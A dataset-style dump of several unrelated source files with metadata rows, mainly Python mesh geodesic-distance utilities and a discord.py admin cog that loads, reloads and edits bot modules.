distances_00 = self.distances_list[0]
distances_01 = self.distances_list[1]
distances_02 = self.distances_list[2]
distances_03 = self.distances_list[3]
for D_00, D_01, D_02, D_03, way in zip(distances_00,
distances_01,
distances_02,
distances_03,
self.way_list):
x = (self.long_way - way) / (self.long_way - self.short_way)
## x is changing from 0 at long_way to 1 at short_way ##
freq = frequency
alpha = freq * math.pi * x
a = minValue
## fomura for the distortion ##
if longWayExtention:
## short way extention ##
y = ((1 - a) / 2) * math.sin(alpha) + ((a + 1) / 2)
if y > 1:
y = 1
elif y < a:
y = a
else:
## long way extention ##
y = ((1 - a) / 2) * math.cos(alpha) + ((a + 1) / 2)
if y > 1:
y = 1
elif y < a:
y = a
## distribute the boundary area depending on the distance calculation with distortion fomura ##
if base_boundary_num == 0:
d_00 = D_00 * (1-time) * y
d_01 = D_01 * (time)
d_02 = D_02 * (time)
d_03 = D_03 * (time)
## set base distance ##
base_dist = d_00
target_dists = [d_01, d_02, d_03]
elif base_boundary_num == 1:
d_00 = D_00 * (time)
d_01 = D_01 * (1-time) * y
d_02 = D_02 * (time)
d_03 = D_03 * (time)
## set base distance ##
base_dist = d_01
target_dists = [d_00, d_02, d_03]
elif base_boundary_num == 2:
d_00 = D_00 * (time)
d_01 = D_01 * (time)
d_02 = D_02 * (1-time) * y
d_03 = D_03 * (time)
## set base distance ##
base_dist = d_02
target_dists = [d_00, d_01, d_03]
elif base_boundary_num == 3:
d_00 = D_00 * (time)
d_01 = D_01 * (time)
d_02 = D_02 * (time)
d_03 = D_03 * (1-time) * y
## set base distance ##
base_dist = d_03
target_dists = [d_00, d_01, d_02]
else:
print("error with setting the base_boundary_num")
break
## select short value ##
short_distance = min([d_00, d_01, d_02, d_03])
if short_distance == d_00:
attr = 0
elif short_distance == d_01:
attr = 1
elif short_distance == d_02:
attr = 2
else:
attr = 3
attrs.append(attr)
## calculate differences ##
dif = base_dist - min(target_dists)
difs.append(dif)
return attrs, difs
##################################################################################
## fandamental geodesics ##
##################################################################################
def compute_geodesic_to_every_vertex(mesh, vertices_start):
"""
compute distances from sevelral vertices to all vertices of the mesh
vertices are described with keys
"""
v, f = mesh.to_vertices_and_faces()
v = np.array(v)
f = np.array(f)
vertices_target = np.arange(len(v)) # all vertices are targets
vstart = np.array(vertices_start)
distances = igl.exact_geodesic(v, f, vstart, vertices_target)
return distances
def compute_geodesic_from_start_to_target_vkeys(mesh, start_v_keys_list, target_v_keys_list):
"""
compute distances from one edges to another edge and get longest way and shortest way
"""
v, f = mesh.to_vertices_and_faces()
v = np.array(v)
f = np.array(f)
vertices_start = np.array(start_v_keys_list)
vertices_target = np.array(target_v_keys_list)
distances = igl.exact_geodesic(v, f, vertices_start, vertices_target)
return distances
def get_distances_list_from_every_boundary(mesh, boundary_vertex_keys_list):
distances_list = []
for seam_vkeys in boundary_vertex_keys_list:
distances = list(compute_geodesic_to_every_vertex(mesh, seam_vkeys))
distances_list.append(distances)
return distances_list
## get way informations ##
def calculate_way_length_on_every_vertex(mesh, seam_vertex_keys_list):
distances_list = get_distances_list_from_every_boundary(mesh, seam_vertex_keys_list)
vkeys = mesh.vertices()
way_list = []
for vkey in vkeys:
vdis_list = [distances[vkey] for distances in distances_list]
vdis_list.sort()
d00 = vdis_list[0]
d01 = vdis_list[1]
way = d00 + d01
way_list.append(way)
temp_list = [way for way in way_list]
temp_list.sort()
short_way = temp_list[0]
long_way = temp_list[-1]
ave_way = sum(temp_list) / len(temp_list)
return short_way, long_way, ave_way, way_list
def get_gap_ratio(mesh, boundary_vertex_keys_list):
short_way, long_way, ave_way, Ds_list = calculate_way_length_on_every_vertex(mesh, boundary_vertex_keys_list)
gap_ratio = (long_way - short_way) / long_way
return gap_ratio
# ##################################################################################
# ## combination of several types of geodesics in a mesh ##
# ##################################################################################
# def vertex_distribution_of_geodesic_realm(mesh, distances_list):
# # distances_list = get_distances_list_from_every_seams(mesh, seam_vertex_keys_list)
# realm_dict = {}
# for i in range(len(distances_list)):
# realm_dict["seam_0" + str(i)] = []
# vkeys = mesh.vertices()
# for vkey in vkeys:
# dist_list = [distances[vkey] for distances in distances_list]
# closest = min(dist_list)
# seam_number = dist_list.index(closest)
# realm_dict["seam_0" + str(seam_number)].append(vkey)
# return realm_dict
#
# def custom_differences_00(mesh, distances_list, time):
# ## pure distance differences no additional distance ##
# global result
# # distances_list = get_distances_list_from_every_seams(mesh, seam_vertex_keys_list)
# vkeys = mesh.vertices()
# if len(distances_list) <= 2:
# difs = [abs(d01 * time - d00 * (1 - time)) for d00, d01 in zip(distances_list[0], distances_list[1])]
# result = difs
# elif len(distances_list) >= 3:
# difs_list = []
# for i in range(len(distances_list)):
# first_distances = distances_list[i]
# difs = []
# for vkey in vkeys:
# left_distances_list = []
# for j, distances in enumerate(distances_list):
# if j != i:
# left_distances_list.append(distances)
# dist_list = [distances[vkey] for distances in distances_list]
# first_seam_dist = first_distances[vkey]
# target_seam_dist = min(dist_list)
#
# d00 = first_seam_dist
# d01 = target_seam_dist
# dif = abs(d01*time - d00*(1-time))
# difs.append(dif)
# difs_list.append(difs)
# result = difs_list
# return result
#
# def custom_differences_01(mesh, seam_vertex_keys_list, time, width=50):
# """
# this transformed distances is for the connection detail between two seams
# """
# ## custom distance differences with changing offset ##
# distances_list = get_distances_list_from_every_boundary(mesh, seam_vertex_keys_list)
# short_way, long_way, ave_way, Ds_list = calculate_way_length_on_every_vertex(mesh, seam_vertex_keys_list)
# ## get the differences from start seam and from last seam ##
# difs00 = []
# for d00, d01 in zip(distances_list[0], distances_list[1]):
# way = d00 + d01
# x = abs(long_way - way)
# y = abs(ave_way - way)
# check_value = abs(long_way - ave_way)
# value = width * math.cos((2 * math.pi / (long_way - short_way)) * x)
# value = value * (1 - 1 / (y + 1))
# if value <= 0:
# value = 0
# else:
# value = value
# addv = value * (0.5 - abs(0.5-time))
# dif = abs((d01 + addv) * time - d00 * (1 - time))
# difs00.append(dif)
# difs01 = []
# for d00, d01 in zip(distances_list[0], distances_list[1]):
# way = d00 + d01
# x = abs(long_way - way)
# y = abs(ave_way - way)
# check_value = abs(long_way - ave_way)
# wid = width
# value = wid * math.cos((2 * math.pi / (long_way - short_way)) * x)
# # value = value * (1 - 1/(y+1))
# if value >= 0:
# value = 0
# else:
# value = value
# addv = value * (0.5 - abs(0.5 - time))
# dif01 = abs((d01 + addv) * time - (d00) * (1 - time))
# difs01.append(dif01)
# difs_list = [difs00, difs01]
# return difs_list
#
# def custom_differences_02(mesh, seam_vertex_keys_list, time, gap_ratio):
# """
#
# this transformed distances is for the adapting way gap solution
#
# """
# ## custom distance differences with changing offset ##
# difs_list = []
# distances_list = get_distances_list_from_every_boundary(mesh, seam_vertex_keys_list)
# short_way, long_way, ave_way, Ds_list = calculate_way_length_on_every_vertex(mesh, seam_vertex_keys_list)
# width = (short_way * gap_ratio)
# ## get the differences from start seam and from last seam ##
# difs00 = []
# for d00, d01 in zip(distances_list[0], distances_list[1]):
# way = d00 + d01
# x = abs(ave_way - way)
# check_value = abs(ave_way - long_way)
# wid = width
# if (ave_way - way) >= 0:
# ## make the value smoother ##
# value = wid * ((x / check_value) ** 1.5) * (1 - 1 / (x + 1))
# else:
# value = 0
# addv = value * (0.5 - abs(0.5 - time))
# dif00 = abs((d01 - addv) * time - d00 * (1 - time))
# difs00.append(dif00)
# difs01 = []
# for d00, d01 in zip(distances_list[0], distances_list[1]):
# way = d00 + d01
# x = abs(ave_way - way)
# check_value = abs(ave_way - long_way)
# wid = width
# if (ave_way - way) >= 0:
# ## make the value smoother ##
# value = wid * ((x / check_value) ** 1.5) * (1 - 1 / (x + 1))
# else:
# value = 0
# addv = value * (0.5 - abs(0.5 - time))
# dif01 = abs((d01 + addv) * time - d00 * (1 - time))
# difs01.append(dif01)
# difs_list = [difs00, difs01]
# return difs_list
#
"""
"""
#############################################################################
## for offsetting path points ##
#############################################################################
def get_closest_points_from_pts_cloud(fromPt, toPtsCloud, num_getPts):
distances = []
for toPt in toPtsCloud:
dis = fromPt.distance_to_point(toPt)
distances.append(dis)
list = [dis for dis in distances]
list.sort()
closest_pts = []
closest_distances = list[:num_getPts]
for distance in closest_distances:
count = 0
for toPt in toPtsCloud:
d = fromPt.distance_to_point(toPt)
if d == distance:
closest_pts.append(toPt)
count += 1
if count == num_getPts: break
if num_getPts == 1:
closest_pts = closest_pts[0]
closest_distances = closest_distances[0]
return closest_pts, closest_distances
def get_distance_to_pts_cloud(fromPt, toPtsCloud):
closest_pts, closest_distances = get_closest_points_from_pts_cloud(fromPt, toPtsCloud, 3)
closest_distance = closest_distances[0]
for i in range(1):
## first two points ##
measure = closest_distances[0] + closest_distances[1]
x = (closest_distances[1] / measure) * closest_pts[0].x + (closest_distances[0] / measure) * closest_pts[1].x
y = (closest_distances[1] / measure) * closest_pts[0].y + (closest_distances[0] / measure) * closest_pts[1].y
z = (closest_distances[1] / measure) * closest_pts[0].z + (closest_distances[0] / measure) * closest_pts[1].z
point_00 = Point(x, y, z)
distance_00 = fromPt.distance_to_point(point_00)
if distance_00 == 0:
cl_distance = 0
cl_point = point_00
continue
## third point ##
measure = closest_distances[0] + closest_distances[2]
x = (closest_distances[0] / measure) * closest_pts[2].x + (closest_distances[2] / measure) * closest_pts[0].x
y = (closest_distances[0] / measure) * closest_pts[2].y + (closest_distances[2] / measure) * closest_pts[0].y
z = (closest_distances[0] / measure) * closest_pts[2].z + (closest_distances[2] / measure) * closest_pts[0].z
point_01 = Point(x, y, z)
distance_01 = fromPt.distance_to_point(point_01)
if distance_01 == 0:
cl_distance = 0
cl_point = point_01
continue
## cl point 00 ##
measure = distance_00 + distance_01
x = (distance_01 / measure) * point_01.x + (distance_00 / measure) * point_00.x
y = (distance_01 / measure) * point_01.y + (distance_00 / measure) * point_00.y
z = (distance_01 / measure) * point_01.z + (distance_00 / measure) * point_00.z
clpt00 = Point(x, y, z)
cld00 = fromPt.distance_to_point(clpt00)
if cld00 == 0:
cl_distance = 0
cl_point = clpt00
continue
## cl point_01 ##
measure = closest_distances[0] + cld00
x = (closest_distances[0] / measure) * clpt00.x + (cld00 / measure) * closest_pts[0].x
y = (closest_distances[0] / measure) * clpt00.y + (cld00 / measure) * closest_pts[0].y
z = (closest_distances[0] / measure) * clpt00.z + (cld00 / measure) * closest_pts[0].z
cl_point = Point(x, y, z)
cl_distance = fromPt.distance_to_point(cl_point)
if cl_distance == 0:
cl_distance = 0
cl_point = cl_point
continue
cllist = [closest_distance, distance_00, distance_01, cld00, cl_distance]
clptlist = [closest_pts[0], point_00, point_01, clpt00, cl_point]
cl_distance = min(cllist)
cl_point = clptlist[cllist.index(cl_distance)]
return cl_distance, cl_point
| 38.996771
| 128
| 0.535773
| 4,518
| 36,228
| 4.028552
| 0.056662
| 0.074996
| 0.039229
| 0.01868
| 0.816109
| 0.784737
| 0.750673
| 0.701445
| 0.689303
| 0.655953
| 0
| 0.044823
| 0.337998
| 36,228
| 928
| 129
| 39.038793
| 0.714089
| 0.34995
| 0
| 0.701271
| 0
| 0
| 0.006623
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061441
| false
| 0
| 0.021186
| 0
| 0.144068
| 0.006356
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c376a4a46e7c2662c729919f42beec49eb6a9bf1
| 196
|
py
|
Python
|
examples/chalicelib/blueprints/__init__.py
|
cuenca-mx/agave
|
d4719bdbab8e200c98d206475df6adb275e9fdcc
|
[
"MIT"
] | 3
|
2020-12-11T16:48:44.000Z
|
2021-03-29T00:05:57.000Z
|
examples/chalicelib/blueprints/__init__.py
|
cuenca-mx/agave
|
d4719bdbab8e200c98d206475df6adb275e9fdcc
|
[
"MIT"
] | 115
|
2020-08-26T13:26:07.000Z
|
2022-03-31T23:58:22.000Z
|
examples/chalicelib/blueprints/__init__.py
|
cuenca-mx/agave
|
d4719bdbab8e200c98d206475df6adb275e9fdcc
|
[
"MIT"
] | null | null | null |
__all__ = ['AuthedRestApiBlueprint']
from agave.blueprints import RestApiBlueprint
from .authed import AuthedBlueprint
class AuthedRestApiBlueprint(AuthedBlueprint, RestApiBlueprint):
...
| 19.6
| 64
| 0.811224
| 15
| 196
| 10.333333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117347
| 196
| 9
| 65
| 21.777778
| 0.895954
| 0
| 0
| 0
| 0
| 0
| 0.112245
| 0.112245
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.4
| 0
| 0.6
| 0.8
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
5ef55d5d210a859399452deba1e7091825667b83
| 132
|
py
|
Python
|
Section09_Decorator/Practice/Square.py
|
enriqueescobar-askida/Kinito.Python
|
e4c5521e771c4de0ceaf81776a4a61f7de01edb4
|
[
"MIT"
] | 1
|
2020-10-20T07:41:51.000Z
|
2020-10-20T07:41:51.000Z
|
Section09_Decorator/Practice/Square.py
|
enriqueescobar-askida/Kinito.Python
|
e4c5521e771c4de0ceaf81776a4a61f7de01edb4
|
[
"MIT"
] | null | null | null |
Section09_Decorator/Practice/Square.py
|
enriqueescobar-askida/Kinito.Python
|
e4c5521e771c4de0ceaf81776a4a61f7de01edb4
|
[
"MIT"
] | null | null | null |
class Square:
def __init__(self, side):
self.side = side
def __str__(self):
return 'A square with side %s' % self.side
| 18.857143
| 46
| 0.651515
| 20
| 132
| 3.9
| 0.55
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.234848
| 132
| 6
| 47
| 22
| 0.772277
| 0
| 0
| 0
| 0
| 0
| 0.159091
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
5efd591c57ebdb81900fd2d8adf59ec48e35b757
| 22
|
py
|
Python
|
vogue/commands/__init__.py
|
mayabrandi/vogue
|
463e6417a9168eadb0d11dea2d0f97919494bcd3
|
[
"MIT"
] | 111
|
2015-01-15T11:53:20.000Z
|
2022-03-26T19:55:24.000Z
|
vogue/commands/__init__.py
|
mayabrandi/vogue
|
463e6417a9168eadb0d11dea2d0f97919494bcd3
|
[
"MIT"
] | 2,995
|
2015-01-15T16:14:20.000Z
|
2022-03-31T13:36:32.000Z
|
arnold/commands/__init__.py
|
Clinical-Genomics/arnold
|
8b0dfe5a97736b60ffc3498b4f54c91f31bfe410
|
[
"MIT"
] | 55
|
2015-05-31T19:09:49.000Z
|
2021-11-01T10:50:31.000Z
|
from .base import cli
| 11
| 21
| 0.772727
| 4
| 22
| 4.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 22
| 1
| 22
| 22
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6f1baf6baf8fc209962c569140f0029a776b9e23
| 14,220
|
py
|
Python
|
cogs/admin.py
|
TheRealKeto/Phantom
|
fa38bb4aa81b33583a345d10a77572acdbafd389
|
[
"MIT"
] | 3
|
2021-05-11T12:46:09.000Z
|
2022-03-19T18:27:32.000Z
|
cogs/admin.py
|
AushaTeam/Phantom
|
fa38bb4aa81b33583a345d10a77572acdbafd389
|
[
"MIT"
] | 1
|
2021-06-02T05:13:10.000Z
|
2021-06-03T23:39:02.000Z
|
cogs/admin.py
|
AushaTeam/Phantom
|
fa38bb4aa81b33583a345d10a77572acdbafd389
|
[
"MIT"
] | 3
|
2021-07-13T18:45:39.000Z
|
2022-02-01T05:00:07.000Z
|
from discord.ext import commands
import aiofiles
import aiohttp
import aiosqlite
import asyncio
import discord
import glob
import math
import time
import platform
class Admin(commands.Cog):
def __init__(self, bot):
self.bot = bot
def get_modules(self):
if platform.system() == 'Windows':
modules = glob.glob('cogs\*.py')
else:
modules = glob.glob('cogs/*.py')
return sorted([module.replace('/', '.').replace('\\', '.')[:-3].split('.')[-1] for module in modules])
@commands.group(invoke_without_command=True)
@commands.is_owner()
async def module(self, ctx):
if ctx.prefix == f'<@!{self.bot.user.id}> ':
prefix = f'{ctx.prefix}`'
else:
prefix = f'`{ctx.prefix}'
embed = discord.Embed(title='Module Commands')
embed.add_field(name='Edit', value=f'{prefix}module edit <module>`', inline=False)
embed.add_field(name='List', value=f'{prefix}module list`', inline=False)
embed.add_field(name='Load', value=f'{prefix}module load <module>`', inline=False)
embed.add_field(name='Reload', value=f'{prefix}module reload <all/module>`', inline=False)
embed.add_field(name='Unload', value=f'{prefix}module unload <module>`', inline=False)
embed.add_field(name='Note:', value='Use commas to separate multiple modules.', inline=False)
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
@module.command()
@commands.is_owner()
@commands.guild_only()
async def edit(self, ctx, *modules):
local_modules = self.get_modules()
modules = [module.lower() for module in modules]
if len(modules) > 1:
embed = discord.Embed(title='Edit Module')
embed.add_field(name='Error', description='You can only edit one module at a time!')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
return
if modules[0] not in local_modules:
embed = discord.Embed(title='Edit Module')
embed.add_field(name='Error', description=f'Module `{modules[0]}` does not exist!')
embed.add_field(name='Available modules:', value=f"`{'`, `'.join(local_modules)}`")
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
return
embed = discord.Embed(title='Edit Module', description=f'Send a link to the raw code you wish to update the `{modules[0]}` module to.')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
message = await ctx.send(embed=embed)
try:
answer = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
except asyncio.exceptions.TimeoutError:
embed = discord.Embed(title='Edit Module')
embed.add_field(name='Error', value='No response given in 1 minute, cancelling.')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
return
await answer.delete()
async with aiofiles.open(f'cogs/{modules[0]}.py', 'r') as f:
old_module = await f.read()
try:
async with aiohttp.ClientSession() as session:
async with session.get(answer.content) as response:
new_module = await response.text().replace(' ', ' ') # fuck space indents, shifts FTW
except aiohttp.client_exceptions.InvalidURL:
embed = discord.Embed(title='Edit Module')
embed.add_field(name='Error', value='Response is not a valid URL.')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
return
if old_module == new_module:
embed = discord.Embed(title='Edit Module')
embed.add_field(name='Error', value=f'URL content is the same as current module `{modules[0]}` content.')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
return
async with aiofiles.open(f'cogs/{modules[0]}.py', 'w') as f:
await f.write(new_module)
try:
self.bot.reload_extension(f'cogs.{modules[0]}')
embed = discord.Embed(title='Edit Module', description=f'Module `{modules[0]}` has been reloaded.')
except discord.ext.commands.ExtensionNotLoaded: # Attempt to load module
try:
self.bot.load_extension(f'cogs.{modules[0]}')
except discord.ext.commands.ExtensionFailed:
embed = discord.Embed(title='Edit Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` has an error, reverting to backup!')
async with aiofiles.open(f'cogs/{modules[0]}.py', 'w') as f:
await f.write(old_module)
except discord.ext.commands.ExtensionFailed:
embed = discord.Embed(title='Edit Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` has an error, reverting to backup!')
async with aiofiles.open(f'cogs/{modules[0]}.py', 'w') as f:
await f.write(old_module)
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
@module.command(name='list')
@commands.guild_only()
@commands.is_owner()
async def _list(self, ctx):
local_modules = self.get_modules()
embed = discord.Embed(title='All Modules', description=f"`{'`, `'.join(local_modules)}`")
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
@module.command()
@commands.is_owner()
@commands.guild_only()
async def load(self, ctx, *modules):
local_modules = self.get_modules()
modules = sorted([module.lower() for module in modules])
if len(modules) > 1 or modules[0] == 'all':
embed = discord.Embed(title='Load Module')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
message = await ctx.send(embed=embed)
successful_loads = int()
failed_loads = int()
for module in (local_modules if modules[0] == 'all' else modules):
if not any(module == x for x in local_modules):
embed.add_field(name='Error', value=f'Module `{module}` does not exist!', inline=False)
await message.edit(embed=embed)
failed_loads += 1
continue
try:
self.bot.load_extension(f'cogs.{module}')
embed.add_field(name='Success', value=f'Module `{module}` successfully unloaded!', inline=False)
await message.edit(embed=embed)
successful_loads += 1
except discord.ext.commands.ExtensionAlreadyLoaded:
embed.add_field(name='Error', value=f'Module `{module}` is already loaded!', inline=False)
await message.edit(embed=embed)
failed_loads += 1
except discord.ext.commands.ExtensionFailed:
embed.add_field(name='Error', value=f'Module `{module}` has an error, cannot load!', inline=False)
await message.edit(embed=embed)
failed_loads += 1
embed.add_field(name='Finished', value=f"**{successful_loads}** module{'s' if successful_loads != 1 else ''} successfully loaded, **{failed_loads}** module{'s' if failed_loads != 1 else ''} failed to load.")
await message.edit(embed=embed)
return
if not any(modules[0] == x for x in local_modules):
embed = discord.Embed(title='Unload Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` does not exist!', inline=False)
embed.add_field(name='Available modules:', value=f"`{'`, `'.join(local_modules)}`", inline=False)
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
return
try:
self.bot.load_extension(f'cogs.{modules[0]}')
embed = discord.Embed(title='Load Module', description=f'Module `{modules[0]}` has been loaded.')
except discord.ext.commands.ExtensionAlreadyLoaded:
embed = discord.Embed(title='Load Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` is already loaded!')
except discord.ext.commands.ExtensionFailed:
embed = discord.Embed(title='Load Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` has an error, cannot load!')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
@module.command(name='reload')
@commands.is_owner()
@commands.guild_only()
async def _reload(self, ctx, *modules):
local_modules = self.get_modules()
modules = sorted([module.lower() for module in modules])
if len(modules) > 1 or modules[0] == 'all':
embed = discord.Embed(title='Reload Module')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
message = await ctx.send(embed=embed)
successful_reloads = int()
failed_reloads = int()
for module in (local_modules if modules[0] == 'all' else modules):
if module not in local_modules:
embed.add_field(name='Error', value=f'Module `{module}` does not exist!', inline=False)
await message.edit(embed=embed)
failed_reloads += 1
continue
try:
self.bot.reload_extension(f'cogs.{module}')
embed.add_field(name='Success', value=f'Module `{module}` successfully reloaded!', inline=False)
await message.edit(embed=embed)
successful_reloads += 1
except discord.ext.commands.ExtensionNotLoaded:
embed.add_field(name='Error', value=f'Module `{module}` is not currently loaded!', inline=False)
await message.edit(embed=embed)
failed_reloads += 1
except discord.ext.commands.ExtensionFailed:
embed.add_field(name='Error', value=f'Module `{module}` failed to reload!', inline=False)
await message.edit(embed=embed)
failed_reloads += 1
embed.add_field(name='Finished', value=f"**{successful_reloads}** module{'s' if successful_reloads != 1 else ''} successfully reloaded, **{failed_reloads}** module{'s' if failed_reloads != 1 else ''} failed to reload.")
await message.edit(embed=embed)
return
if modules[0] not in local_modules:
embed = discord.Embed(title='Reload Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` does not exist!', inline=False)
embed.add_field(name='Available modules:', value=f"`{'`, `'.join(local_modules)}`", inline=False)
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
return
try:
self.bot.reload_extension(f'cogs.{modules[0]}')
embed = discord.Embed(title='Reload Module', description=f'Module `{modules[0]}` has been reloaded.')
except discord.ext.commands.ExtensionNotLoaded:
try:
self.bot.load_extension(f'cogs.{modules[0]}')
except discord.ext.commands.ExtensionFailed:
embed = discord.Embed(title='Reload Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` has an error, cannot load!')
except discord.ext.commands.ExtensionFailed:
embed = discord.Embed(title='Reload Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` has an error, cannot load!')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
@module.command()
@commands.is_owner()
@commands.guild_only()
async def unload(self, ctx, *modules):
local_modules = self.get_modules()
modules = sorted([module.lower() for module in modules])
if len(modules) > 1 or modules[0] == 'all':
embed = discord.Embed(title='Unload Module')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
message = await ctx.send(embed=embed)
successful_unloads = int()
failed_unloads = int()
for module in (local_modules if modules[0] == 'all' else modules):
if not any(module == x for x in local_modules):
embed.add_field(name='Error', value=f'Module `{module}` does not exist!', inline=False)
await message.edit(embed=embed)
failed_unloads += 1
continue
if module == 'admin':
embed.add_field(name='Error', value=f'Module `{module}` cannot be unloaded!', inline=False)
await message.edit(embed=embed)
failed_unloads += 1
continue
try:
self.bot.unload_extension(f'cogs.{module}')
embed.add_field(name='Success', value=f'Module `{module}` successfully unloaded!', inline=False)
await message.edit(embed=embed)
successful_unloads += 1
except discord.ext.commands.ExtensionNotLoaded:
embed.add_field(name='Error', value=f'Module `{module}` is already unloaded!', inline=False)
await message.edit(embed=embed)
failed_unloads += 1
embed.add_field(name='Finished', value=f"**{successful_unloads}** module{'s' if successful_unloads != 1 else ''} successfully unloaded, **{failed_unloads}** module{'s' if failed_unloads != 1 else ''} failed to unload.")
await message.edit(embed=embed)
return
if not any(modules[0] == x for x in local_modules):
embed = discord.Embed(title='Unload Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` does not exist!', inline=False)
embed.add_field(name='Available modules:', value=f"`{'`, `'.join(local_modules)}`", inline=False)
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
return
try:
self.bot.unload_extension(f'cogs.{modules[0]}')
embed = discord.Embed(title='Unload Module', description=f'Module `{modules[0]}` has been unloaded.')
except discord.ext.commands.ExtensionNotLoaded:
embed = discord.Embed(title='Unload Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` is already unloaded!')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
def setup(bot):
bot.add_cog(Admin(bot))
| 44.024768
| 223
| 0.697117
| 2,012
| 14,220
| 4.80666
| 0.088469
| 0.033089
| 0.053769
| 0.070313
| 0.815738
| 0.79423
| 0.77448
| 0.748733
| 0.726709
| 0.686485
| 0
| 0.005319
| 0.153797
| 14,220
| 322
| 224
| 44.161491
| 0.798388
| 0.003727
| 0
| 0.664207
| 0
| 0.01107
| 0.22858
| 0.015316
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01107
| false
| 0
| 0.0369
| 0
| 0.095941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6f29ab20c6c08d6be96b13a58c9169db980e2bea
| 24
|
py
|
Python
|
src/opf/__init__.py
|
krivopolianskii/opf
|
16cfe25194fd15c21702658cac302fe0dfce82d9
|
[
"MIT"
] | null | null | null |
src/opf/__init__.py
|
krivopolianskii/opf
|
16cfe25194fd15c21702658cac302fe0dfce82d9
|
[
"MIT"
] | null | null | null |
src/opf/__init__.py
|
krivopolianskii/opf
|
16cfe25194fd15c21702658cac302fe0dfce82d9
|
[
"MIT"
] | null | null | null |
from .models import *
| 6
| 21
| 0.666667
| 3
| 24
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 24
| 3
| 22
| 8
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
